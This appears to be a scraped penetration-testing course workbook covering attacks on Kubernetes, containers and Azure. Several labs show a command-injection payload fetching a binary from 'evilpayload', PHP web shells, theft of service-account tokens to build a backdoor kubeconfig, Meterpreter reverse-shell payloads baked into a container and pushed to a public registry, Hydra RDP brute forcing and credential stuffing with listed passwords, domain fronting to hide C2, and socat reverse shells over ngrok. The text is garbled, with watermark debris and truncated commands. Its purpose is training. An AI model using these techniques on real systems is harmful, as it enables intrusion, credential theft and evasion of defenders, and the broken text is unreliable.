This does not grant you access to a Kubernetes cluster; it only grants you access to get a configuration. You should note that this was the default configuration in versions prior to 1.2 and, while more and more rare, could still be the case.
This command should output any pods that we may have running in our environment:

$ kubectl get pods

There are many pods and containers that may be running. We can attach to one of these instances by running the following command:

$ kubectl exec -ti <pod> -- /bin/bash

This would allow us to interact with the container's /bin/bash environment.

You may not get a prompt! Type:

ls

This should work.

Now that we have this level of access let's see how we can make better assumptions.

CTRL-C

We have a few options. If you recall from an earlier exercise we had command injection.

Find the ping-svc pod; this was the vulnerable process through which we are going to execute a few commands.

Find a directory to run our payload. We will create one in /tmp/studentX, replacing X with your numerical value:
Using the command injection lab, one of the options that we could also attempt is:

cmdinj.php?=curl+http://evilpayload/peirates+-o+/tmp/studentX/peirates;/bin/chmod+777+/tmp/studentX/peirates

This would copy the binary to the system; we would need a separate way to gain access to the system.

This will take some time to copy. Once it is there we can then execute peirates. There are a few ways to do this; we could always run:

$ kubectl exec -i ping-svc-<random-number> -- /tmp/studentX/peirates

If you miss the -i it will not work and you will need to CTRL-C.

From here we will have a menu system. A few things we can do:

2. Type 10 to get a list of secrets!
One final thing we can do is to actually use the kubelet service account, if it is misconfigured, against the system. This would require a serious node misconfiguration, but these configurations are not uncommon:

We should see a list of secrets. Record the name of the secret; you will need it for the next commands.

The secret you are looking for will be of the following TYPE: kubernetes.io/service-account-token

Token:

Alternatively, if you didn't have access to the Kubernetes API itself with kubectl but had access to the container, the values are found there.

Do not do this now, but the command below would be run from within the container. Below is an example:

root@<container># ls /var/run/secrets/kubernetes.io

The ca.crt and token. Normally these two items would not cause an issue, as workloads need to speak back to the API server. This is of course unless someone has loosened that restriction. How could we internally or externally leverage these types of credentials?

Below, this command continues the previous commands:

$ cat /home/sec588/.kube/config | grep server

server:

Place the certificate value within the 'certificate value' section of kubetest without the quotes. Place the server value within the 'server value' section of kubetest without the quotes. Place the token value within the 'token value' section of kubetest without the quotes.

You now have a cryptographically signed service account login for Kubernetes.

$ nano kubetest
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: 'certificate value'
    server: 'server value'
  name: development
contexts:
- context:
    cluster: development
    user: aws
  name: aws
current-context: aws
kind: Config
preferences: {}
users:
- name: aws
  user:
    token: 'token value'

To see if this runs type the following:

$ kubectl --kubeconfig kubetest get pods

If you can list out pods you now have a backdoored account to the Kubernetes management system.
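As an added example, not part of the workbook, this Python does the kubetest assembly for you and first decodes the stolen token's claims so you know which service account you are about to become. The server, CA and token values are constructed samples: the token has the claim layout of a service account JWT but an invalid signature, which is exactly the part a real stolen token supplies and you cannot forge.

```python
import base64
import json

# Constructed samples standing in for the server line from .kube/config and
# the files under /var/run/secrets/kubernetes.io/serviceaccount/.
SAMPLE_SERVER = "https://ABCDEF1234567890.gr7.us-east-1.eks.amazonaws.com"
SAMPLE_CA_PEM = ("-----BEGIN CERTIFICATE-----\n"
                 "MIIBsampleNotARealCertificateBodyForIllustrationOnly==\n"
                 "-----END CERTIFICATE-----\n")


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_sample_token(namespace: str = "default", sa: str = "ping-svc") -> str:
    """Constructed JWT with the claim layout of a service account token. The
    signature is junk: a real token is signed by the API server's key, and
    that signature is the part you cannot forge and therefore steal."""
    header = _b64url(json.dumps({"alg": "RS256", "kid": "sample"}).encode())
    claims = _b64url(json.dumps({
        "iss": "kubernetes/serviceaccount",
        "kubernetes.io/serviceaccount/namespace": namespace,
        "kubernetes.io/serviceaccount/service-account.name": sa,
        "sub": f"system:serviceaccount:{namespace}:{sa}",
    }).encode())
    return f"{header}.{claims}.notarealsignature"


def token_claims(token: str) -> dict:
    """Decode the middle segment without verifying, to learn which service
    account in which namespace the token represents before using it."""
    claims = token.split(".")[1]
    claims += "=" * (-len(claims) % 4)          # restore the stripped padding
    return json.loads(base64.urlsafe_b64decode(claims))


def ca_data(ca_pem: str) -> str:
    """certificate-authority-data holds base64 of the PEM text, not the PEM."""
    return base64.b64encode(ca_pem.encode()).decode()


def build_kubeconfig(server: str, ca_pem: str, token: str, cluster: str = "development") -> str:
    """Emit the kubetest file from the walkthrough with the three values filled in."""
    return "\n".join([
        "apiVersion: v1",
        "clusters:",
        "- cluster:",
        f"    certificate-authority-data: {ca_data(ca_pem)}",
        f"    server: {server}",
        f"  name: {cluster}",
        "contexts:",
        "- context:",
        f"    cluster: {cluster}",
        "    user: aws",
        "  name: aws",
        "current-context: aws",
        "kind: Config",
        "preferences: {}",
        "users:",
        "- name: aws",
        "  user:",
        f"    token: {token}",
        "",
    ])
```

Write the result to kubetest and point kubectl at it with --kubeconfig; the sub claim is what the API server's RBAC rules are evaluated against, so a token whose sub is system:serviceaccount:default:ping-svc has exactly the rights bound to that account, nothing more.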
Conclusions

Additional Resources
Brief Intro

While many of us are not developers, we may find the need to build or operate a "heavy" or "light" shell as part of a penetration test. Understanding the difference between each of those is key to understanding how we could use an environment.

Requirements for This Lab

This lab does not require internet connectivity; the lab is self-contained, running from your computer. You will need the following tools:

Try It Yourself

We wanted to demonstrate the big difference between a lightweight shell and a bigger heavyweight shell.

1. Go into /opt/php-webshell
2. Run the following command: docker-compose up -d
3. Access the test environment with a web browser by going to http://localhost:8080; you will see a phpinfo() page.
5. Once this is all running, look at the differences between each page by looking at the following files:

$ cat /opt/php-webshell/code/webshell.php
$ cat /opt/php-webshell/code/lightshell.php

Then run these commands through each shell:

cat /etc/passwd
env
id

Try to do it in a single command and make the output 'pretty'; see how the more you add, the more the shell's traffic changes in Wireshark.

Walkthrough

Setting up the environment

Let's open the MATE terminal so that we can get our local environment running.
lightshell.php: whatever PHP code you paste into the POST in the x variable will be run as PHP code. This is different from webshell.php.

auth.php: the same as lightshell.php, but you need to provide an HTTP Authorization Bearer token.

Now that we understand each, let's start our docker instance.

$ cd /opt/php-webshell
$ docker-compose up -d

This should reflect that two containers are now running in your environment.
Let's open a Firefox browser to validate what we are seeing by opening up firefox, found on the desktop.

Navigate to http://localhost:8080

Let's open up Wireshark as well. The easiest way to do this is to open up another MATE shell.

To monitor our interface we can select it and click on the shark fin in the corner. The traffic we care about never leaves the machine, so the interface to capture on is:
Loopback

The Wireshark interface may zoom by. One of the ways you can see what is going on is to use the filter; type

If you need to see what the HTTP request is doing you can right-click and choose Follow | HTTP Stream.

The portion in red is the request, the portion in blue is the response. Using this you can observe each request.

The first shell we will be looking at is the standard GET-requested webshell.
In the terminal window run the following command:

$ cat /opt/php-webshell/code/webshell.php

You will see a very small shell that will execute a system command based on whatever is passed to the variable x. You can execute it like so:

$ curl http://localhost:8080/webshell.php?x=ls

If we look at Wireshark, what you will see is a very small request with a large response:

Given this, let's run a few other commands so that you can see how the system works:

$ curl http://localhost:8080/webshell.php?x=id
$ curl http://localhost:8080/webshell.php?x=env
$ curl http://localhost:8080/webshell.php?x=cat+/etc/passwd
Now the lightweight shell:

$ curl http://localhost:8080/lightshell.php

You will just see a Hi. To see why, let's go ahead and cat out the file:

$ cat /opt/php-webshell/code/lightshell.php

eval($_POST['x']);

What this is telling the system is that whatever is sent in a POST request as x must be evaluated as PHP. Here the requests are bigger: we are not just sending system commands, entire PHP scripts can be sent in for evaluation at runtime.

You can always look at Wireshark and see the sizes. Obviously the response sizes will be large, but the request sizes are now growing, because these shells are very lightweight on the server but can be very large on the wire. Both shells as written share two weaknesses:
1. It's not encrypted in any way; even if you wrap HTTPS around it, that can be intercepted in a proxy.
2. The shell has no access control; anyone who finds it can run it.

$ cat /opt/php-webshell/code/auth.php

if ($_SERVER['HTTP_AUTHORIZATION'] == 'Bearer 12345') {
    ....
    if(isset($_POST['x'])) {

We have two different checks here. First we need an HTTP header:

Authorization: Bearer 12345

This is a static, weak password, but it is still not a bare shell. You also need to POST to 'x' just like in the previous example. Let's explore this.

We can copy the previous --data POST command from before and modify it to change the URL to http://localhost:8080/auth.php and add the header.

We now have an authorization-based header. No one would really want to hack this way; however, if we are in the middle of choosing an operation and choosing a shell, here are the properties of a web shell you want:

1. If it's a lightweight shell there will be less evidence on the host; if there is a heavy shell, all of your shells will have a payload that may contain things like passwords for authentication.
2. You may want to consider a shell that provides some type of authorization mechanism.
3. You may want to consider wrapping this not just in transport layer encryption such as HTTPS but also in encryption that is in the stream itself.
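The following Python, added here rather than taken from /opt/php-webshell, reproduces the three requests as raw HTTP so their sizes can be compared without Wireshark, and implements the auth.php bearer check with a constant-time comparison in place of the == in the file. The PHP snippet carried by the lightweight requests is a constructed sample; the host and paths are the lab's.

```python
import hmac
from urllib.parse import urlencode

HOST = "localhost:8080"


def raw_request(method: str, path: str, body: str = "", headers: dict = None) -> bytes:
    """Assemble the bytes curl would put on the wire, so the lengths match what
    Wireshark's Follow | HTTP Stream shows (minus curl's own User-Agent line)."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {HOST}"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    if body:
        lines.append("Content-Type: application/x-www-form-urlencoded")
        lines.append(f"Content-Length: {len(body.encode())}")
    return ("\r\n".join(lines) + "\r\n\r\n" + body).encode()


def heavy_shell_request(cmd: str) -> bytes:
    """webshell.php: only the command travels, in the query string."""
    return raw_request("GET", f"/webshell.php?x={cmd}")


# Constructed PHP a lightshell operator might send: the logic a heavy shell
# keeps on disk is carried inside every single request instead.
LIGHTSHELL_SCRIPT = ("$o=[];foreach(['id','env','cat /etc/passwd'] as $c)"
                     "{$o[$c]=shell_exec($c);}echo json_encode($o);")


def light_shell_request(php_code: str = LIGHTSHELL_SCRIPT) -> bytes:
    """lightshell.php: the whole program is POSTed in x and eval()'d."""
    return raw_request("POST", "/lightshell.php", body=urlencode({"x": php_code}))


def auth_shell_request(token: str, php_code: str = LIGHTSHELL_SCRIPT) -> bytes:
    """auth.php: same as lightshell plus the Authorization header it checks."""
    return raw_request("POST", "/auth.php", body=urlencode({"x": php_code}),
                       headers={"Authorization": f"Bearer {token}"})


def request_sizes() -> dict:
    """Bytes on the wire for one use of each shell, the comparison the lab
    has you read off Wireshark."""
    return {"webshell.php GET": len(heavy_shell_request("ls")),
            "lightshell.php POST": len(light_shell_request()),
            "auth.php POST": len(auth_shell_request("12345"))}


def check_bearer(header_value: str, expected_token: str = "12345") -> bool:
    """auth.php's check done safely: require the Bearer scheme and compare in
    constant time, instead of == on the whole header string."""
    scheme, _, presented = header_value.partition(" ")
    if scheme != "Bearer" or not presented:
        return False
    return hmac.compare_digest(presented.encode(), expected_token.encode())
```

The numbers make the workbook's point: the heavy shell's request is a few dozen bytes and all of the incriminating logic sits on disk, while each lightweight request carries the program itself, which is both why it leaves less on the host and why it stands out on the wire.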
Conclusions

The ability for us to validate and understand the changes that occur in the most sensitive parts of our infrastructure environments will be paramount to understanding what is occurring in the overall architecture. Are defenders monitoring the most sensitive and critical files in their network? Is there something they can do to make the environment better? This includes modifications to Dockerfiles and .travis.yml files, which are very sensitive files in an organization.

In Lab 4.1 we should have reverted this SSH configuration file; please make sure this is done:

host github.com
    Hostname github.com
    IdentityFile ~/.ssh/sec588-wiki-vm-keys
    #IdentityFile /home/sec588/.ssh/day4
    User git

This will allow wiki-updater.sh to work.

Why This Lab Is Important

Additional Resources
20
Brief Intro
, 20
28
pauljones166@outlook_com
This lab will introduce you to the concept of a backdoored container. There will be many di erent ways in which
ly
you can do this but we are going to show some of the gotcha's that you will encounter.
Ju
>
om
Requirements for This Lab
_c
ok
In this lab we will be creating an ngrok account for port forwarding TCP traffic.
The following are the requirements for this to work:
Access to ngrok.io
Docker will be running on your host.
Please note this lab will rely heavily on Metasploit Meterpreter. Running any host antivirus on your host may inhibit the ability to execute Meterpreter. Please remove that antivirus as required by the Course Requirements.
Try It Yourself
2. Register your local ngrok with that account so that the authtoken works
5. Build a Container that will execute the same payload from within the container.
Walkthrough
Let us begin by obtaining a valid ngrok key. To do this, open Firefox:
Navigate to www.ngrok.com. This will provide you with a page to sign up for a valid ngrok account; click SIGN UP.
Once you are logged in, you can now copy the authtoken in step 3.
The next part will be to add the authtoken and test it. To do this you will need to open a terminal.
If this worked correctly, you should see a screenshot somewhat similar to the one below:
The URL is random for every student. Let's see how we can use this as a web server:
$ cd /tmp
$ python -m 'SimpleHTTPServer' 9999
http://<random-ngrok-hostname>.ngrok.io
The attack we are going to execute will look like the diagram below, and yes, it is a circular attack:
Building a Linux Backdoor
CTRL-C or close the Python SimpleHTTPServer terminal window.
Once you do this, you can either open a new window or continue in the same window.
First is building our backdoor; with msfvenom we will create a standard stageless Meterpreter.
$ mkdir /home/sec588/files/workdir/container
$ cd /home/sec588/files/workdir/container
What follows below with the ngrok hostname is without the http:// prefix.
$ /opt/metasploit-framework/msfvenom -p linux/x86/meterpreter_reverse_http LHOST=<ngrok-
$ sudo /opt/metasploit-framework/msfconsole
msf5> use exploit/multi/handler
msf5> set PAYLOAD linux/x86/meterpreter_reverse_http
msf5> set LPORT 9999
msf5> exploit -j
$ ./a
This should execute our payload and in our metasploit window we should see a new session created.
Once the executed payload is working, you can now interact with the system:
msf5> sessions -i 1
meterpreter> sysinfo
If the system returns information you have a working backdoor; type exit in the Metasploit Meterpreter session.
CTRL-C in the ./a window.
Let's now build an example of an evil container to execute our payload. Open a text editor to create the following file:
$ nano /home/sec588/files/workdir/container/Dockerfile
RUN apt update -y && apt-get install curl wget -y
COPY a /bin/a
CMD ["/bin/a"]
CTRL-X in nano will close the file. Now we will need to build our container:
$ docker build -t studentX-a .
Once this builds, you will then locate the docker image:
$ docker image ls
The container will appear broken; just leave this window running for a minute, it will not show you a prompt. The container should now be running; let's attach to that process.
$ docker ps
You will see a ContainerID; copy that number and run the following command:
You may find that every once in a while the system will no longer connect. This is a problem with ngrok, and as such you may have to: exit ngrok, restart it, and rebuild your msfvenom command with the new URL.
Switch over to the Metasploit console window. We can now execute the following commands from within msfconsole:
You may have to hit enter to get the msf5> prompt.
msf5> sessions -l
meterpreter> sysinfo
meterpreter> ps
This provides us a nice way to slide a backdoor into a container registry if we want to.
If you have extra time
There is a way to copy a container into a public registry like Docker Hub, as an example.
1. Register an account with Docker Hub (http://hub.docker.com).
2. Record your username with Docker Hub. Example: mosesrenegade is the author's.
3. Copy your container into the Docker Hub system. You will need to:
$ docker login
You will then need to push that image into your repository:
online wiki (http://wiki.<class-subdomain>.sec588.net/files/kubs.yaml) or the local wiki (http://localhost/wiki/files/kubs.yaml)
6. Edit the YAML so that we can run it in the container; replace the XXXX with your student number. Replace the DOCKERNAME/DOCKERCONTAINER information with your Docker information. Here is an EXAMPLE (do not copy and paste; it will not work).
run: student9001-a # This was replaced
name: student9001-a # This was replaced
run: student9001-a # This was replaced
7. To see if you have kubectl working, type the following:
kubectl get pods
8. If you find that you are having challenges with that, you can do the following to restore your kubeconfig.
#!/bin/bash
rm -Rf /home/sec588/.kube/config
profile lab22
kubectl apply -f kubs.yaml
10. You should go back to your Metasploit session and, if you find that Metasploit is not able to run, use the following:
msf5> exploit -j
It could be that exploit/multi/handler did not work. This would fix it.
Troubleshooting
Common issues include: you run kubectl get pods and you get the following issue:
This is usually something wrong with the container build. Run your container from your sec588 virtual machine and make sure it still connects!
Alternatively, if you see CrashLoopBackOff or ImagePullBackOff and don't see an issue, do the following:
Get your pod name:
kubectl get pods
Then describe your pod:
kubectl describe pods <podname>
Look at the errors to see if the image isn't pulling or the container isn't running.
Conclusions
We may wish to deploy a container with a backdoor; this may allow us to bury a container very deep into an environment so that we can start to pivot laterally and move around. Given that we may be in this scenario, it is critical for us to understand how to build containers correctly.
This lab takes what is a seemingly well-known backdoor like Meterpreter and lets us execute it in the context of a container.
Additional Resources
Brief Intro
CDN networks and proxies are ubiquitous on the Internet today. The industry terms for many of these devices tend to be one of the following:
1. Caching Devices
2. Proxies
3. Middleboxes
Given that most traffic today is encrypted, decrypting each packet is almost universally impossible. In some cases, it is not just cost-ineffective, but also impossible when dealing with desktop applications. Many of an organization's content-filtering devices leverage SNI information to filter, but not decrypt, the traffic. An attacker can hide their traffic sources by leveraging CDN network proxies to redirect attacks to their C2 environments.
These types of attacks are known as Domain Fronting, and we will be performing this attack today. To perform this attack, we need to be able to control a CDN endpoint; for part one of our attack, we need to set up the CDN networks in Azure. Azure does still support Domain Fronting, and since our CDN shares the same system as the Microsoft CDN, we will be able to hide our traffic using Microsoft CDN systems.
Try It Yourself
To try this lab yourself you need to perform the following steps:
1. Figure out which users are alive in the Azure Portal by trying different usernames and observing the results.
2. Log in with a valid user.
Walkthrough
Finding the users in our environment.
Use Firefox to complete the following steps:
Go to: https://portal.azure.com
Come up with 5-10 random American/English first names, for example:
mike
will
dustin
lucas
nancy
barb
sec588.net
sec588.org
sec588.com
For example:
mike@sec588.org
mike@sec588.com
Do any of these work? What is the difference in the login prompt when the following is used:
jerry@sec588.com
Setting up the environment
Let's open the MATE terminal so that we can get our local environment running.
Make sure that docker-compose is down.
$ cd /opt/php-webshell
$ docker-compose down
Get into our code directory.
$ cd /opt/php-webshell/code
$ python -m 'SimpleHTTPServer' 8080
Open another terminal and start ngrok:
$ az login -u jerry@sec588.com -p HumanMusic2019
Now that we are logged in as Jerry again, let's set up a CDN network for the second part of our lab; this will take
az cdn endpoint create --name studentXsec588 --profile studentX-sec588 --origin <ngrok URL> --
The following is an instructor example so students can validate what their command line may look like.
Once this is set up, we will then need to use the Azure Portal to finish setting up the endpoint, as not every feature is available over the az CLI.
Use Firefox to complete the following steps:
Go to: https://portal.azure.com
Log in as the Jerry user to be able to perform the operations to add a CDN into the system.
From the Azure Portal search box type: cdn
The CDN Profiles area should show up:
Once you are in the Endpoint configuration, you need to change two options.
Click on the Caching Rules menu and change the Cache Behavior to Bypass Cache.
CLICK SAVE
From this point on, the ngrok HTTP window should not be closed. This URL is dynamic and is currently tied to your CDN. This process takes anywhere from 10 minutes to 60 minutes to be made available on the Internet. If you close the ngrok HTTP window, Lab 5.5 may take longer than expected.
Conclusion
In this lab, we have demonstrated how we can perform username enumeration, which is a key component of
username and password guessing attacks. We have also started the setup of our CDN Domain Fronting lab,
Brief Intro
We wanted to make sure that all of our students understand the importance of a few things. First, why Multi-Factor Authentication is critical in any environment, by performing a password guessing attack. Secondly, we would like our students to better understand why this methodology works. Third, we want to demonstrate how to actually perform a Credential Stuffing attack, as many of these attacks are still relatively unknown.
Requirements for This Lab
This lab requires a few items:
Try It Yourself
1. Run az vm list-instances and obtain the PublicIpAddress for the dc1 host.
2. The dc1 host has RDP enabled.
3. Build a list of known users; consider what you know about the environment: administrator, jerry,
5. Use pw-inspector to trim the wordlist to the default Windows 2019 password complexity rules: lowercase,
Walkthrough
Let's open the MATE terminal so that we can get our local environment configured:
$ cd /home/sec588/files/wordlists
$ wc -l rockyou.txt
Next we will count the number of words in this smaller file:
$ wc -l /tmp/rockyou-small.txt
This should now be ~750,000 lines:
734298 /tmp/rockyou-small.txt
This wordlist is now 10,000 lines long. This is considerably smaller than what we started with. Let's see how this
The easiest way for us to find our IP addresses in Azure is to run the following command:
This will display the computers on the left and the IP addresses on the right.
Copy the DC1 IP address, as it will be our target.
Hydra Users and Passwords
Let's attempt to build a users file that we can work with:
$ nano /home/sec588/files/workdir/users.txt
administrator
admin
summer
jerry
sec588
george
Why these words? Well, in previous labs we had a user named summer, we had one named jerry, we also have some standard ones like administrator and admin, and for fun we are throwing the class name in here. Sometimes usernames for service accounts end up being company names, project names and the like.
username file:
/home/sec588/files/workdir/users.txt
The first attack will be a standard dictionary attack:
NOTE: THIS ATTACK WILL NOT FINISH; read on after you hit ENTER.
$ cd /home/sec588/files/workdir
$ hydra -L users.txt -P rockyou-smaller.txt -t 4 rdp://<publicIpAddress>
This will take a long time to work; by our estimation, after 2 or 3 minutes you will see a [STATUS] message. If you read it, it will state that you will find your password after 1.5 to 2 hours. Let's see the difference between this and maybe a more targeted attack:
Let's now try a password attack that is more targeted, with a targeted wordlist.
Targeted Wordlist
$ nano /home/sec588/files/workdir/password-target.txt
Spring2018
Summer2018
Fall2018
Winter2018
Spring2019
Summer2019
Fall2019
Winter2019
Spring2020
$ hydra -L users.txt -P password-target.txt -t 4 rdp://<publicIpAddress>
Credential Stuffing Slow Attack
$ nano /home/sec588/files/workdir/stuffing.txt
Administrator:Administrator
admin:admin
summer:SnakeJazz2020
jerry:HumanMusic2019
sec588:Winter2019
So here we have an extremely targeted wordlist, only 1 attempt per user. This is arguably faster than what we had before.
This works our methodology in reverse. How would we do this in the real world?
1. Build a list of users; there may be some guessing here, or you may be informed.
2. Build a list of passwords that each user may have used; this may have been through exposed password leaks.
3. Once the list is exhausted, attempt to guess common passwords.
4. You can also build a targeted wordlist using a tool like CeWL.
5. Once both of these options are done, you can move into larger dictionary lists.
Remember you do not need to crack ALL the user accounts; typically you need one or more.
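The seasonal and word-plus-year passwords in this lab all satisfy Windows complexity, which is the real lesson for defenders: complexity rules do not stop a targeted wordlist, a banned-password filter and MFA do. The following is an added example written for this page (not course or pw-inspector code); it assumes the complexity rule as "at least three of four character classes, no three-character run of the username" and a minimum length of 7, and the sample wordlist is constructed.

```python
import re

# Assumed policy (not from the course): Windows complexity = at least 3 of the 4 classes
# below and no 3+ character slice of the username; minimum length 7 is also an assumption.
MIN_LENGTH = 7
CLASSES = (str.isupper, str.islower, str.isdigit, lambda c: not c.isalnum())

SEASONS = r"(spring|summer|fall|autumn|winter)"
MONTHS = r"(january|february|march|april|may|june|july|august|september|october|november|december)"
PREDICTABLE = [
    re.compile(rf"^{SEASONS}(19|20)?\d{{2}}\W*$", re.I),   # Summer2019, Winter19!
    re.compile(rf"^{MONTHS}(19|20)?\d{{2}}\W*$", re.I),    # March2020
    re.compile(r"^[A-Za-z]+(19|20)\d{2}\W*$"),             # HumanMusic2019, SnakeJazz2020
]


def contains_username_fragment(password, username, run=3):
    """True if any 3+ character slice of the username appears in the password (case-insensitive)."""
    pw, user = password.lower(), username.lower()
    if len(user) < run:
        return bool(user) and user in pw
    return any(user[i:i + run] in pw for i in range(len(user) - run + 1))


def meets_windows_complexity(password, username=""):
    """Approximate the 'passwords must meet complexity requirements' check (assumed rules above)."""
    if len(password) < MIN_LENGTH:
        return False
    if username and contains_username_fragment(password, username):
        return False
    classes_present = sum(any(test(c) for c in password) for test in CLASSES)
    return classes_present >= 3


def is_predictable(password, org_terms=()):
    """True for season/month/word+year patterns or passwords built on organisation terms."""
    if any(p.match(password) for p in PREDICTABLE):
        return True
    return any(term.lower() in password.lower() for term in org_terms if term)


def trim_wordlist(words, username=""):
    """pw-inspector style filter: keep only candidates that could satisfy the policy at all."""
    return [w for w in words if meets_windows_complexity(w, username)]


def banned_by_policy(words, org_terms=()):
    """Defender view: entries a banned-password filter should reject although they pass complexity."""
    return [w for w in words if meets_windows_complexity(w) and is_predictable(w, org_terms)]


# Constructed sample mixing rockyou-style entries with the lab's seasonal and stuffing passwords.
SAMPLE_WORDS = ["123456", "password", "iloveyou", "Summer2019", "Winter2019!", "HumanMusic2019",
                "SnakeJazz2020", "sec588Rocks1", "correct-horse-battery", "Tr0ub4dor&3"]

if __name__ == "__main__":
    print("survive complexity:", trim_wordlist(SAMPLE_WORDS, "jerry"))
    print("should be banned:  ", banned_by_policy(SAMPLE_WORDS, org_terms=("sec588",)))
```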
Conclusions
This lab was designed to cover a critical component of penetration testing, and that is the use of passwords, credential stuffing, and targeted wordlists in a penetration test. Passwords are a critical part of testing; don't disregard them.
Sometimes you will find a list of usernames and passwords in larger lists; other times you will find that users have very predictable passwords over time. Keep this in mind.
You seldom find valid and good information on using good password tools against live targets. The information is not always available to you, and it's almost certainly not well documented at times. This lab helps you start working through these issues.
Additional Resources
SANS SEC560: Network Penetration Testing and Ethical Hacking (https://www.sans.org/sec540)
Brief Intro
In Lab 5.3, it was discussed that CDNs are a critical component of the Internet. They allow content providers to move large datasets much closer to the end user. Content Delivery Networks quite often are built of proxies and proxy-like technologies. These proxies, however, are front-ending almost all customers, typically in a shared environment, for scalability. How does a shared proxy system move traffic from its front door over to the actual system?
The Host: header directs the traffic accordingly. Here is an example:
Going to do.skype.com, the packets are formulated to resolve this to the Azure CDN server: example.azureedge.net.
GET / HTTP/2
Host: do.skype.com
What if we ask our system to go to https://do.skype.com, yet redirect the Host: header to our EvilC2?
The system formulates a request to do.skype.com. The traffic does forward to azureedge and, potentially, depending on the system, includes the SNI in the TLS handshake. The proxy will redirect the traffic not to do.skype.com but to us.
Why would we want to do this? To hide our real intent and evade proxies.
One of the other important things about this lab is that you do not close or interfere with the ngrok http process. Internet connectivity: the lab is self-contained, running from your computer. You will need the following tools:
Curl from the command line
Try It Yourself
We wanted to demonstrate the big di erence between a Lightweight Shell and a bigger heavyweight shell.
1. Make sure you can get to your machine using the Azure CDN.
2. Call the profile: studentX-sec588
3. Call the endpoint: student1-sec588
4. Use port 8080; start a SimpleHTTPServer on port 8080 in the php-webshell directory.
5. While this builds, switch to the socat lab.
6. At this point the CDN should be available; run the following commands:
curl to download the azureedge endpoint to make sure you can access your webshell directory
curl to download the same endpoint to make sure you can get the Host header pointing to azureedge but
Walkthrough
Let's open the MATE terminal so that we can get our local environment running.
In the new window, let's make sure that we are still running the Python server.
Make sure you have a window with the following command still running:
While our shell is propagating, let's get everything set up to work with domain fronting. First let's understand what we are trying to do; using tcpdump we can start to get an idea of what we will be attempting to do in our environment.
Open a MATE Terminal and type the following commands:
$ sudo wireshark
This will bring up Wireshark in the environment. Wireshark will be our validation engine.
Enter port 443 as the capture filter.
Choose the eth0 interface, which may be the default chosen. Once you click on the shark fin it will start capturing traffic.
Now let's make a connection using curl. Open another MATE terminal and type:
$ curl https://studentXsec588.azureedge.net
Apply the display filter ssl.handshake.
This will display only the handshakes, which will show the initial Client Hello message. If we have propagated everything correctly, you will see a message in Wireshark for a TLS 1.3 Client Hello message.
You need to find that message; once you do, you can open it by clicking:
Secure Sockets Layer | TLS 1.3 Record Type | Handshake Protocol | Extensions: Server Name Indicator
What will our content filters see as the server we are going to? There are a few options here; one is that we will do a DNS lookup for student1sec588.azureedge.net and this will be the server that is used. There is another option, and that option is that we will not be using azureedge.net at all; we could use a legitimate service. Let's explore that option.
We know that using our own C2 domain could be problematic. It could be blocked, or it could reveal our attacker infrastructure. Let's move to hiding our attack; what we will do is request an Azure CDN based website that is hosted by azureedge. We could find these by doing a Google dork. A few known URLs:
do.skype.com
ajax.microsoft.com
Since these sites are all HTTPS, what will our content filters see?
do.skype.com
This is a Skype URL that will be allowed through in many locations; how will we get to our attacker infrastructure? We will tell our proxy that the host we are requesting is ACTUALLY our attacker infrastructure.
Going back to our window, we now type a new command; this time studentXsec588.azureedge.net is now going to be our Host header, NOT the host we are going to initiate communication with. The host we will initiate communication with is Skype.
Wireshark now gets a new CLIENT HELLO. This time it will not be from studentX attacker infrastructure; it will be from do.skype.com. Our content filters will believe we are talking to that domain, and we will not be able to block it if we are legitimately using Skype in our environments.
This is how domain fronting works: both requests will provide the same results, but content filters and DNS filters will see different request destinations.
Conclusions
Domain Fronting and redirections through alternative methods can be useful in hiding what we are trying to do, specifically in avoiding detection and creating new pathways to valid websites and channels. Domain Fronting, while supposedly 'dead', is actually a valid attack path in a few service providers. The danger is that the service provider may notice that you are using this channel, so you must tread carefully.
This lab shows us another way to evade detection when conducting red team activities by using the very same cloud infrastructures that we may be assessing in order to circumvent protections. Defenders have to find new and better ways to detect what it is that we are trying to do, while the attackers have to then find new ways to evade defenders. This is another great example of the cat and mouse game that we play.
Brief Intro
We will be playing with some of the redirection options to help you build really dumb relays and really simple relays as options for the following actions that you may need to use in your environment:
1. Getting a reverse shell locally
2. Using ngrok to pivot between local and remote
3. Using socat to port forward
Requirements for This Lab
This lab does not require Internet connectivity; the lab is self-contained, running from your computer. You will need ngrok and socat.
Try It Yourself
We wanted to demonstrate the big di erence between a Lightweight Shell and a bigger heavyweight shell.
1. Shovel a socat shell to yourself, and run some commands; notice that the shell is an actual shell, and not a
2. Bring down the ngrok http shell and move to a TCP ngrok redirection. Play with the TCP redirection and socat.
3. Forward a port with socat so that you can move from one port to another.
Walkthrough
Setting up the environment
Let's open the MATE terminal so that we can get our local environment running.
$ cd /tmp
Notice the /tmp; this will be our attacker shell. We will be creating a REVERSE connection INTO this shell.
$ socat file:`tty`,raw,echo=0 tcp-listen:9998
What does this command do? It opens a file handle and executes a tty shell; it is a raw shell and the echo is set to off (or 0).
$ ifconfig eth0
What does this command do? It runs an executable of bash -li; it is attached as a pty, with stderr, stdin, and stdout. It will then connect to your computer on port 9998.
Go back to your original window; if the prompt changes from sec588@slingshot:/tmp $ to sec588@slingshot:~$ you have now created a socat shell.
The prompt moves from /tmp to ~.
Run some additional commands such as:
tty
id
hostname
pwd
Notice that with the tty command you have a real shell! With error handling!
$ exit
Now in the socat exec command let's change the connect address:
tcp:0.tcp.ngrok.io:<randomport>
The <randomport> will be replaced with whatever value ngrok assigns to you.
Sometimes socat will NOT resolve the 0.tcp.ngrok.io name; if this happens:
$ dig 0.tcp.ngrok.io
Record the IP address and make the socat command like so:
tcp:<PublicIpAddress>:<randomport>
How can we up-level this a bit more? What if we want a PHP redirector like the one that we described with PHP Hop? Let's next attempt this to try and further obfuscate things.
$ exit
You will also want to 'exit' the ngrok commands.
Portforwards
$ cd /opt/php-webshell/code
Let's now curl this directory:
$ curl http://<yourLinuxIp>:9999
It should return some HTML with directories in it, like below:
$ socat TCP-LISTEN:9998,fork TCP:<yourLinuxIp>:9999
Let's try this command; open a new MATE Terminal and type in this command, replacing <yourLinuxIp> with your Linux IP!
$ curl http://<yourLinuxIp>:9998
Conclusions
